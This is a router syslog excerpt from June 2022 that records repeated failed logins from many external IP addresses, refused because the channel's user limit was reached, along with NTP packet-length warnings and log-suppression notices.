JUN  7 2022 01:08:51+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01NTP/4/PACKET_LENGTH_WRONG(L)[25]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=192)
JUN  7 2022 01:00:53+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01LINE/4/LOGIN_FAIL(S)[26]:FAILED TO LOGIN. (IP=5.77.16.148, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JUN  7 2022 00:59:59+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01LINE/4/LOGIN_FAIL(S)[27]:FAILED TO LOGIN. (IP=159.250.166.117, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JUN  7 2022 00:59:59+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01LINE/4/LOGIN_FAIL(S)[28]:FAILED TO LOGIN. (IP=182.120.13.88, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JUN  7 2022 00:59:19+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01LINE/4/LOGIN_FAIL(S)[29]:FAILED TO LOGIN. (IP=182.120.13.88, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JUN  7 2022 00:58:55+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01LINE/4/LOGIN_FAIL(S)[30]:FAILED TO LOGIN. (IP=182.120.13.88, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JUN  7 2022 00:58:36+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01LINE/4/LOGIN_FAIL(S)[31]:FAILED TO LOGIN. (IP=182.120.13.88, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JUN  7 2022 00:49:29+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01LINE/4/LOGIN_FAIL(S)[32]:FAILED TO LOGIN. (IP=194.31.98.17, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JUN  7 2022 00:47:36+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01LINE/4/LOGIN_FAIL(S)[33]:FAILED TO LOGIN. (IP=31.220.3.140, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JUN  7 2022 00:35:44+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01LINE/4/LOGIN_FAIL(S)[34]:FAILED TO LOGIN. (IP=31.220.3.140, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JUN  7 2022 00:29:44+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01INFO/4/SUPPRESS_LOG(L)[35]:LAST MESSAGE REPEATED 4 TIMES.(INFOID=3224911879, MODULENAME=LINE, INFOALIAS=LOGIN_FAIL)
JUN  7 2022 00:29:37+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01LINE/4/LOGIN_FAIL(S)[36]:FAILED TO LOGIN. (IP=47.46.80.238, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JUN  7 2022 00:29:19+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01INFO/4/SUPPRESS_LOG(L)[37]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3224911879, MODULENAME=LINE, INFOALIAS=LOGIN_FAIL)
JUN  7 2022 00:29:16+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01LINE/4/LOGIN_FAIL(S)[38]:FAILED TO LOGIN. (IP=197.58.254.171, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JUN  7 2022 00:04:54+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01NTP/4/PACKET_LENGTH_WRONG(L)[39]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=192)
JUN  6 2022 23:25:23+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01INFO/4/SUPPRESS_LOG(L)[40]:LAST MESSAGE REPEATED 7 TIMES.(INFOID=3224911879, MODULENAME=LINE, INFOALIAS=LOGIN_FAIL)
JUN  6 2022 23:25:09+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01LINE/4/LOGIN_FAIL(S)[41]:FAILED TO LOGIN. (IP=68.206.208.243, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JUN  6 2022 23:24:45+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01INFO/4/SUPPRESS_LOG(L)[42]:LAST MESSAGE REPEATED 7 TIMES.(INFOID=3224911879, MODULENAME=LINE, INFOALIAS=LOGIN_FAIL)
JUN  6 2022 23:24:38+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01LINE/4/LOGIN_FAIL(S)[43]:FAILED TO LOGIN. (IP=68.206.208.243, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JUN  6 2022 23:20:54+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01LINE/4/LOGIN_FAIL(S)[44]:FAILED TO LOGIN. (IP=217.133.194.82, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JUN  6 2022 23:20:54+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01INFO/4/SUPPRESS_LOG(L)[45]:LAST MESSAGE REPEATED 4 TIMES.(INFOID=3224911879, MODULENAME=LINE, INFOALIAS=LOGIN_FAIL)
JUN  6 2022 23:20:42+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01LINE/4/LOGIN_FAIL(S)[46]:FAILED TO LOGIN. (IP=68.206.208.243, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JUN  6 2022 23:20:16+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01INFO/4/SUPPRESS_LOG(L)[47]:LAST MESSAGE REPEATED 9 TIMES.(INFOID=3224911879, MODULENAME=LINE, INFOALIAS=LOGIN_FAIL)
JUN  6 2022 23:20:10+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01LINE/4/LOGIN_FAIL(S)[48]:FAILED TO LOGIN. (IP=68.206.208.243, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JUN  6 2022 23:13:39+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01NTP/4/PACKET_LENGTH_WRONG(L)[49]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=192)
JUN  6 2022 23:08:55+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01INFO/4/SUPPRESS_LOG(L)[50]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
JUN  6 2022 23:08:47+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01NTP/4/PACKET_LENGTH_WRONG(L)[51]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=12)
JUN  6 2022 23:08:33+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01LINE/4/LOGIN_FAIL(S)[52]:FAILED TO LOGIN. (IP=217.133.194.82, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JUN  6 2022 23:08:30+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01LINE/4/LOGIN_FAIL(S)[53]:FAILED TO LOGIN. (IP=31.220.3.140, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JUN  6 2022 23:06:20+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01INFO/4/SUPPRESS_LOG(L)[54]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
JUN  6 2022 23:05:47+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01NTP/4/PACKET_LENGTH_WRONG(L)[55]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=8)
JUN  6 2022 22:58:02+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01NTP/4/PACKET_LENGTH_WRONG(L)[56]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=192)
JUN  6 2022 22:57:41+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01INFO/4/SUPPRESS_LOG(L)[57]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
JUN  6 2022 22:57:17+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01NTP/4/PACKET_LENGTH_WRONG(L)[58]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=8)
JUN  6 2022 22:56:43+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01LINE/4/LOGIN_FAIL(S)[59]:FAILED TO LOGIN. (IP=107.175.87.164, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JUN  6 2022 22:55:07+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01LINE/4/LOGIN_FAIL(S)[60]:FAILED TO LOGIN. (IP=217.133.194.82, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JUN  6 2022 22:53:23+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01LINE/4/LOGIN_FAIL(S)[61]:FAILED TO LOGIN. (IP=217.133.194.82, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JUN  6 2022 22:44:58+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01INFO/4/SUPPRESS_LOG(L)[62]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
JUN  6 2022 22:44:54+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01NTP/4/PACKET_LENGTH_WRONG(L)[63]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=8)
JUN  6 2022 22:36:04+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01LINE/4/LOGIN_FAIL(S)[64]:FAILED TO LOGIN. (IP=31.220.3.140, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JUN  6 2022 22:35:59+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01INFO/4/SUPPRESS_LOG(L)[65]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
JUN  6 2022 22:35:34+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01NTP/4/PACKET_LENGTH_WRONG(L)[66]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=8)
JUN  6 2022 22:28:14+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01LINE/4/LOGIN_FAIL(S)[67]:FAILED TO LOGIN. (IP=142.93.204.250, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JUN  6 2022 22:27:51+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01LINE/4/LOGIN_FAIL(S)[68]:FAILED TO LOGIN. (IP=39.87.196.156, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JUN  6 2022 22:27:13+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01INFO/4/SUPPRESS_LOG(L)[69]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3224911879, MODULENAME=LINE, INFOALIAS=LOGIN_FAIL)
JUN  6 2022 22:27:10+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01LINE/4/LOGIN_FAIL(S)[70]:FAILED TO LOGIN. (IP=41.37.138.18, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JUN  6 2022 22:27:06+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01LINE/4/LOGIN_FAIL(S)[71]:FAILED TO LOGIN. (IP=142.93.204.250, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JUN  6 2022 22:27:05+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01INFO/4/SUPPRESS_LOG(L)[72]:LAST MESSAGE REPEATED 4 TIMES.(INFOID=3224911879, MODULENAME=LINE, INFOALIAS=LOGIN_FAIL)
JUN  6 2022 22:26:56+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01LINE/4/LOGIN_FAIL(S)[73]:FAILED TO LOGIN. (IP=142.93.204.250, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JUN  6 2022 22:26:41+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01LINE/4/LOGIN_FAIL(S)[74]:FAILED TO LOGIN. (IP=142.93.204.250, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JUN  6 2022 22:26:40+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01LINE/4/LOGIN_FAIL(S)[75]:FAILED TO LOGIN. (IP=163.125.71.209, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JUN  6 2022 22:26:40+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01INFO/4/SUPPRESS_LOG(L)[76]:LAST MESSAGE REPEATED 2 TIMES.(INFOID=3224911879, MODULENAME=LINE, INFOALIAS=LOGIN_FAIL)
JUN  6 2022 22:26:33+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01LINE/4/LOGIN_FAIL(S)[77]:FAILED TO LOGIN. (IP=142.93.204.250, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JUN  6 2022 22:26:32+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01INFO/4/SUPPRESS_LOG(L)[78]:LAST MESSAGE REPEATED 5 TIMES.(INFOID=3224911879, MODULENAME=LINE, INFOALIAS=LOGIN_FAIL)
JUN  6 2022 22:26:27+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01LINE/4/LOGIN_FAIL(S)[79]:FAILED TO LOGIN. (IP=142.93.204.250, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JUN  6 2022 22:09:43+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01NTP/4/PACKET_LENGTH_WRONG(L)[80]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=192)
JUN  6 2022 22:09:19+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01LINE/4/LOGIN_FAIL(S)[81]:FAILED TO LOGIN. (IP=31.220.3.140, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JUN  6 2022 22:03:50+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01LINE/4/LOGIN_FAIL(S)[82]:FAILED TO LOGIN. (IP=31.220.3.140, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JUN  6 2022 21:04:52+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01LINE/4/LOGIN_FAIL(S)[83]:FAILED TO LOGIN. (IP=31.220.3.140, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JUN  6 2022 20:36:12+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01INFO/4/SUPPRESS_LOG(L)[84]:LAST MESSAGE REPEATED 5 TIMES.(INFOID=3224911879, MODULENAME=LINE, INFOALIAS=LOGIN_FAIL)
JUN  6 2022 20:36:09+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01LINE/4/LOGIN_FAIL(S)[85]:FAILED TO LOGIN. (IP=94.244.134.107, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JUN  6 2022 20:35:41+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01INFO/4/SUPPRESS_LOG(L)[86]:LAST MESSAGE REPEATED 2 TIMES.(INFOID=3224911879, MODULENAME=LINE, INFOALIAS=LOGIN_FAIL)
JUN  6 2022 20:35:29+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01LINE/4/LOGIN_FAIL(S)[87]:FAILED TO LOGIN. (IP=142.93.204.250, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JUN  6 2022 20:33:49+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01LINE/4/LOGIN_FAIL(S)[88]:FAILED TO LOGIN. (IP=45.190.159.23, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JUN  6 2022 20:33:18+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01NTP/4/PACKET_LENGTH_WRONG(L)[89]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=192)
JUN  6 2022 20:14:51+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01INFO/4/SUPPRESS_LOG(L)[90]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3224911879, MODULENAME=LINE, INFOALIAS=LOGIN_FAIL)
JUN  6 2022 20:13:45+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01LINE/4/LOGIN_FAIL(S)[91]:FAILED TO LOGIN. (IP=142.93.204.250, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JUN  6 2022 20:13:33+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01LINE/4/LOGIN_FAIL(S)[92]:FAILED TO LOGIN. (IP=142.93.204.250, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JUN  6 2022 20:02:24+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01LINE/4/LOGIN_FAIL(S)[93]:FAILED TO LOGIN. (IP=182.114.91.60, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JUN  6 2022 20:01:36+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01LINE/4/LOGIN_FAIL(S)[94]:FAILED TO LOGIN. (IP=182.114.91.60, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JUN  6 2022 20:01:00+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01LINE/4/LOGIN_FAIL(S)[95]:FAILED TO LOGIN. (IP=182.114.91.60, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JUN  6 2022 20:00:35+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01LINE/4/LOGIN_FAIL(S)[96]:FAILED TO LOGIN. (IP=182.114.91.60, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JUN  6 2022 20:00:19+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01LINE/4/LOGIN_FAIL(S)[97]:FAILED TO LOGIN. (IP=182.114.91.60, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JUN  6 2022 20:00:00+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01LINE/4/LOGIN_FAIL(S)[98]:FAILED TO LOGIN. (IP=182.114.91.60, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JUN  6 2022 19:59:46+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01INFO/4/SUPPRESS_LOG(L)[99]:LAST MESSAGE REPEATED 5 TIMES.(INFOID=3224911879, MODULENAME=LINE, INFOALIAS=LOGIN_FAIL)
JUN  6 2022 19:59:43+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01LINE/4/LOGIN_FAIL(S)[100]:FAILED TO LOGIN. (IP=81.214.108.90, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JUN  6 2022 19:59:40+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01LINE/4/LOGIN_FAIL(S)[101]:FAILED TO LOGIN. (IP=142.93.204.250, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JUN  6 2022 19:58:46+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01INFO/4/SUPPRESS_LOG(L)[102]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3224911879, MODULENAME=LINE, INFOALIAS=LOGIN_FAIL)
JUN  6 2022 19:58:36+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01LINE/4/LOGIN_FAIL(S)[103]:FAILED TO LOGIN. (IP=142.93.204.250, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JUN  6 2022 19:58:27+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01INFO/4/SUPPRESS_LOG(L)[104]:LAST MESSAGE REPEATED 3 TIMES.(INFOID=3224911879, MODULENAME=LINE, INFOALIAS=LOGIN_FAIL)
JUN  6 2022 19:58:25+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01LINE/4/LOGIN_FAIL(S)[105]:FAILED TO LOGIN. (IP=81.214.108.90, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JUN  6 2022 19:58:22+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01LINE/4/LOGIN_FAIL(S)[106]:FAILED TO LOGIN. (IP=142.93.204.250, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JUN  6 2022 19:58:15+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01LINE/4/LOGIN_FAIL(S)[107]:FAILED TO LOGIN. (IP=142.93.204.250, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JUN  6 2022 19:57:30+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01LINE/4/LOGIN_FAIL(S)[108]:FAILED TO LOGIN. (IP=142.93.204.250, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JUN  6 2022 19:57:28+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01INFO/4/SUPPRESS_LOG(L)[109]:LAST MESSAGE REPEATED 14 TIMES.(INFOID=3224911879, MODULENAME=LINE, INFOALIAS=LOGIN_FAIL)
JUN  6 2022 19:56:50+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01INFO/4/SUPPRESS_LOG(L)[110]:LAST MESSAGE REPEATED 19 TIMES.(INFOID=3224911879, MODULENAME=LINE, INFOALIAS=LOGIN_FAIL)
JUN  6 2022 19:56:19+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01LINE/4/LOGIN_FAIL(S)[111]:FAILED TO LOGIN. (IP=142.93.204.250, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JUN  6 2022 19:56:01+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01LINE/4/LOGIN_FAIL(S)[112]:FAILED TO LOGIN. (IP=142.93.204.250, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JUN  6 2022 19:55:54+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01LINE/4/LOGIN_FAIL(S)[113]:FAILED TO LOGIN. (IP=142.93.204.250, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JUN  6 2022 19:55:35+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01LINE/4/LOGIN_FAIL(S)[114]:FAILED TO LOGIN. (IP=142.93.204.250, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JUN  6 2022 19:47:14+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01INFO/4/SUPPRESS_LOG(L)[115]:LAST MESSAGE REPEATED 3 TIMES.(INFOID=3224911879, MODULENAME=LINE, INFOALIAS=LOGIN_FAIL)
JUN  6 2022 19:46:53+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01LINE/4/LOGIN_FAIL(S)[116]:FAILED TO LOGIN. (IP=142.93.204.250, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JUN  6 2022 19:46:11+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01LINE/4/LOGIN_FAIL(S)[117]:FAILED TO LOGIN. (IP=142.93.204.250, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JUN  6 2022 19:46:08+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01INFO/4/SUPPRESS_LOG(L)[118]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3224911879, MODULENAME=LINE, INFOALIAS=LOGIN_FAIL)
